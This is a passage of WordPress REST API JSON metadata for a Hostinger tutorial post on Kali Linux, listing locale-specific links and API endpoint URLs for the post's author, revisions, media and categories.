\/www.hostinger.com\/mx\/tutoriales\/tutorial-kali-linux","default":0},{"locale":"es-CO","link":"https:\/\/www.hostinger.com\/co\/tutoriales\/tutorial-kali-linux","default":0},{"locale":"en-AU","link":"https:\/\/www.hostinger.com\/au\/tutorials\/kali-linux-tutorial","default":0},{"locale":"en-NG","link":"https:\/\/www.hostinger.com\/ng\/tutorials\/kali-linux-tutorial","default":0}],"_links":{"self":[{"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/posts\/119150","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/users\/411"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/comments?post=119150"}],"version-history":[{"count":12,"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/posts\/119150\/revisions"}],"predecessor-version":[{"id":129400,"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/posts\/119150\/revisions\/129400"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/media\/129402"}],"wp:attachment":[{"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/media?parent=119150"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/categories?post=119150"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/tags?post=119150"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}